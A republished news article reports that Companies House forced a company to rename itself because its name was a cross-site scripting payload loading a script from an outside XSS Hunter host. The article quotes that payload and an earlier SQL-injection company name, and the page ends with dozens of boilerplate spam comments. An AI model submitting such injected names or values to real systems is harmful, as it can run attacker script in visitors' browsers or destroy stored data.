Company forced to change name that could be used to hack websites | UK news

Companies House has forced a company to change its name after it belatedly realised it could pose a security risk.

The company now legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” was set up by a British software engineer, who says he did it purely because he thought it would be “a fun playful name” for his consulting business.

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.

The original name of the company was ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.

Similar names have been registered in the past, such as “; DROP TABLE “COMPANIES”;– LTD”, a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply “Company name available on request”.

The director of the company, who asked not to be named, told the Guardian: “Government Digital Service – GDS – have a good reputation for security, and other companies with similarly playful names have been registered in the past, so I thought there probably wouldn’t be a problem.

“When I discovered there were some minor problems, I contacted Companies House and the National Cyber Security Centre immediately, and didn’t disclose the issue to anyone else.”

He did not realise it would be an issue, he said, because characters including > and “ are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.

A Companies House spokesperson said: “A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites. We have taken immediate steps to mitigate this risk and have put measures in place to prevent a similar occurrence. We are confident that Companies House services remain secure.”


Source link

121 thoughts on “Company forced to change name that could be used to hack websites | UK news

  1. I simply want to tell you that I am just beginner to weblog and seriously liked your blog. Almost certainly I’m want to bookmark your website . You surely come with fantastic articles. Bless you for sharing your web-site.

  2. I simply want to mention I am just beginner to blogs and really savored this website. Most likely I’m planning to bookmark your website . You really have very good posts. Thanks a bunch for sharing with us your website page.

  3. Good day very cool site!! Guy .. Excellent .. Superb .. I will bookmark your site and take the feeds also…I’m satisfied to find so many useful information right here within the post, we want develop more techniques in this regard, thanks for sharing. . . . . .

  4. I do love the manner in which you have presented this specific issue plus it really does provide me some fodder for consideration. Nevertheless, from what I have experienced, I simply just trust when the feed-back pile on that people today continue to be on issue and don’t get started upon a soap box associated with some other news du jour. Yet, thank you for this exceptional piece and though I do not go along with it in totality, I regard your perspective.

  5. When I originally commented I clicked the -Notify me when new feedback are added- checkbox and now each time a remark is added I get four emails with the identical comment. Is there any means you’ll be able to remove me from that service? Thanks!

  6. There are some fascinating cut-off dates on this article however I don’t know if I see all of them middle to heart. There’s some validity however I will take maintain opinion till I look into it further. Good article , thanks and we wish extra! Added to FeedBurner as effectively

  7. I’m not that much of a online reader to be honest but your blogs really nice, keep it up! I’ll go ahead and bookmark your site to come back later. Many thanks

  8. I simply want to say I’m newbie to blogs and absolutely loved you’re web site. Almost certainly I’m going to bookmark your website . You surely have superb writings. With thanks for revealing your webpage.

  9. Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You obviously know what youre talking about, why throw away your intelligence on just posting videos to your site when you could be giving us something informative to read?

  10. Howdy! This post could not be written much better! Looking at this post reminds me of my previous roommate! He constantly kept talking about this. I will send this article to him. Fairly certain he’ll have a great read. Thank you for sharing!

  11. Good site! I truly love how it is nice on my eyes it is. I am wondering how I might be notified when a new post has been made. I’ve subscribed to your RSS feed which may do the trick? Have a nice day!

  12. I have learned some important matters through your blog post. One other stuff I would like to express is that there are lots of games that you can buy which are designed especially for preschool age little ones. They incorporate pattern identification, colors, pets, and shapes. These usually focus on familiarization rather than memorization. This will keep little ones engaged without sensing like they are learning. Thanks

  13. This is one of the best posts I enjoyed this read in this blog. I’m absolutely excited to get to read such a well blog. The amount of data that I get is truly great. This is an good masterpiece. I’m truly impressed.

  14. you are actually a just right webmaster. The web site loading velocity is amazing. It seems that you are doing any distinctive trick. Furthermore, The contents are masterpiece. you have performed a fantastic process in this subject! Prishtina Travel

  15. Can I simply say what a relief to discover someone that actually knows what they’re discussing over the internet. You actually understand how to bring an issue to light and make it important. More and more people should check this out and understand this side of your story. It’s surprising you are not more popular given that you most certainly have the gift.

  16. Good post. I learn something totally new and challenging on sites I stumbleupon every day. It will always be exciting to read content from other authors and practice something from their web sites.

  17. Oh my goodness! Awesome article dude! Thank you so much, However I am experiencing difficulties with your RSS. I don’t understand the reason why I cannot subscribe to it. Is there anyone else getting similar RSS problems? Anyone that knows the answer can you kindly respond? Thanks.

  18. I have to thank you for the efforts you have put in writing this website. I’m hoping to check out the same high-grade content from you later on as well. In truth, your creative writing abilities has inspired me to get my own, personal blog now 😉

  19. I think other site proprietors should take this website as an model, very clean and excellent user genial style and design, let alone the content. You’re an expert in this topic!

  20. What i do not understood is actually how you’re not actually much more well-liked than you may be now. You are so intelligent. You realize therefore significantly relating to this subject, produced me personally consider it from a lot of varied angles. Its like men and women aren’t fascinated unless it’s one thing to accomplish with Lady gaga! Your own stuffs nice. Always maintain it up!

  21. Nice post. I learn something totally new and challenging on websites I stumbleupon every day. It’s always exciting to read content from other writers and practice something from their websites.

  22. When I initially left a comment I seem to have clicked on the -Notify me when new comments are added- checkbox and now whenever a comment is added I get four emails with the exact same comment. Is there a means you are able to remove me from that service? Kudos.

  23. Youre so cool! I dont suppose Ive learn something like this before. So good to seek out somebody with some unique thoughts on this subject. realy thank you for starting this up. this web site is one thing that’s wanted on the internet, somebody with a bit of originality. helpful job for bringing one thing new to the web!

  24. You’re so interesting! I don’t suppose I’ve truly read through something like that before. So wonderful to discover somebody with some unique thoughts on this issue. Really.. thanks for starting this up. This site is something that’s needed on the web, someone with some originality.

  25. A person necessarily lend a hand to make critically articles I’d state. This is the first time I frequented your web page and thus far? I surprised with the research you made to create this actual put up amazing. Wonderful task!

  26. Attractive component of content. I simply stumbled upon your site and in accession capital to say that I get in fact enjoyed account your weblog posts. Anyway I’ll be subscribing in your augment or even I success you get right of entry to consistently rapidly.

  27. Next time I read a blog, I hope that it does not fail me as much as this particular one. I mean, Yes, it was my choice to read through, nonetheless I really thought you would have something helpful to say. All I hear is a bunch of complaining about something you could possibly fix if you weren’t too busy looking for attention.

  28. Howdy, There’s no doubt that your site may be having web browser compatibility issues. Whenever I take a look at your blog in Safari, it looks fine however, if opening in I.E., it has some overlapping issues. I merely wanted to give you a quick heads up! Besides that, fantastic website!

  29. Aw, this was an incredibly nice post. Finding the time and actual effort to produce a good article… but what can I say… I hesitate a lot and never seem to get nearly anything done.

  30. Even if it is just a half hour per day, you will see a big difference in your horse’s state of mind. For the second step, you need to familiarize yourself with the backhoe controls while you are getting the backhoe to warm up.

  31. After looking over a number of the articles on your web site, I truly appreciate your technique of blogging. I bookmarked it to my bookmark webpage list and will be checking back in the near future. Take a look at my web site as well and tell me what you think.

  32. This is the right webpage for everyone who would like to find out about this topic. You know so much its almost tough to argue with you (not that I personally would want to…HaHa). You definitely put a fresh spin on a topic that has been discussed for a long time. Wonderful stuff, just excellent.

  33. Hello there, I think your web site could be having browser compatibility problems. When I take a look at your blog in Safari, it looks fine however when opening in I.E., it has some overlapping issues. I just wanted to provide you with a quick heads up! Apart from that, great website!

  34. What your saying is completely proper. I know that all people must say the incredibly exact same issue, but I just presume that you put it in a way that everyone can totally grasp. I also actually like the photographs you position in the adhering to. They match so nicely with what youre attempting to say. Im guaranteed youll accomplish so quite a couple of men and women with what youve acquired to say.

  35. An outstanding share! I’ve just forwarded this onto a colleague who had been conducting a little research on this. And he actually ordered me breakfast simply because I discovered it for him… lol. So let me reword this…. Thank YOU for the meal!! But yeah, thanks for spending the time to discuss this topic here on your internet site.

  36. A motivating discussion is definitely worth comment. I do think that you should publish more on this issue, it might not be a taboo matter but typically people do not speak about these issues. To the next! Cheers!

  37. Excellent post. I was checking constantly this blog and I am impressed! Very helpful information particularly the last part 🙂 I care for such information much. I was seeking this certain info for a long time. Thank you and best of luck.

  38. Excellent post. I used to be checking constantly this blog and I’m impressed! Extremely helpful information specially the last phase 🙂 I care for such information a lot. I used to be looking for this particular info for a long time. Thank you and good luck.

  39. Nice post. I learn something totally new and challenging on sites I stumbleupon every day. It will always be useful to read through content from other authors and use something from other web sites.

  40. Great – I should definitely pronounce, impressed with your web site. I had no trouble navigating through all tabs and related info ended up being truly easy to do to access. I recently found what I hoped for before you know it in the least. Reasonably unusual. Is likely to appreciate it for those who add forums or something, web site theme . a tones way for your client to communicate. Nice task..

  41. Hello there! This post couldn’t be written any better! Reading through this post reminds me of my previous room mate! He always kept talking about this. I will forward this write-up to him. Pretty sure he will have a good read. Thanks for sharing!

  42. After looking at a handful of the articles on your web site, I honestly like your technique of blogging. I book-marked it to my bookmark webpage list and will be checking back soon. Please check out my web site as well and tell me your opinion.

  43. When I initially commented I seem to have clicked on the -Notify me when new comments are added- checkbox and from now on whenever a comment is added I receive 4 emails with the same comment. Is there a way you can remove me from that service? Thanks.

  44. Thank you so much for giving everyone remarkably pleasant chance to read in detail from this web site. It is often very awesome and as well , stuffed with a good time for me and my office mates to search your web site nearly thrice in a week to learn the newest items you have. Of course, I am just certainly satisfied with the remarkable techniques you serve. Some 3 ideas in this article are really the simplest I’ve had.

  45. Hey very cool website!! Man .. Excellent .. Amazing .. I will bookmark your website and take the feeds also…I am happy to find numerous useful information here in the post, we need work out more strategies in this regard, thanks for sharing. . . . . .

  46. I’m truly enjoying the design and layout of your blog. It’s a very easy on the eyes which makes it much more pleasant for me to come here and visit more often. Did you hire out a designer to create your theme? Excellent work!

Leave a Reply

Your email address will not be published. Required fields are marked *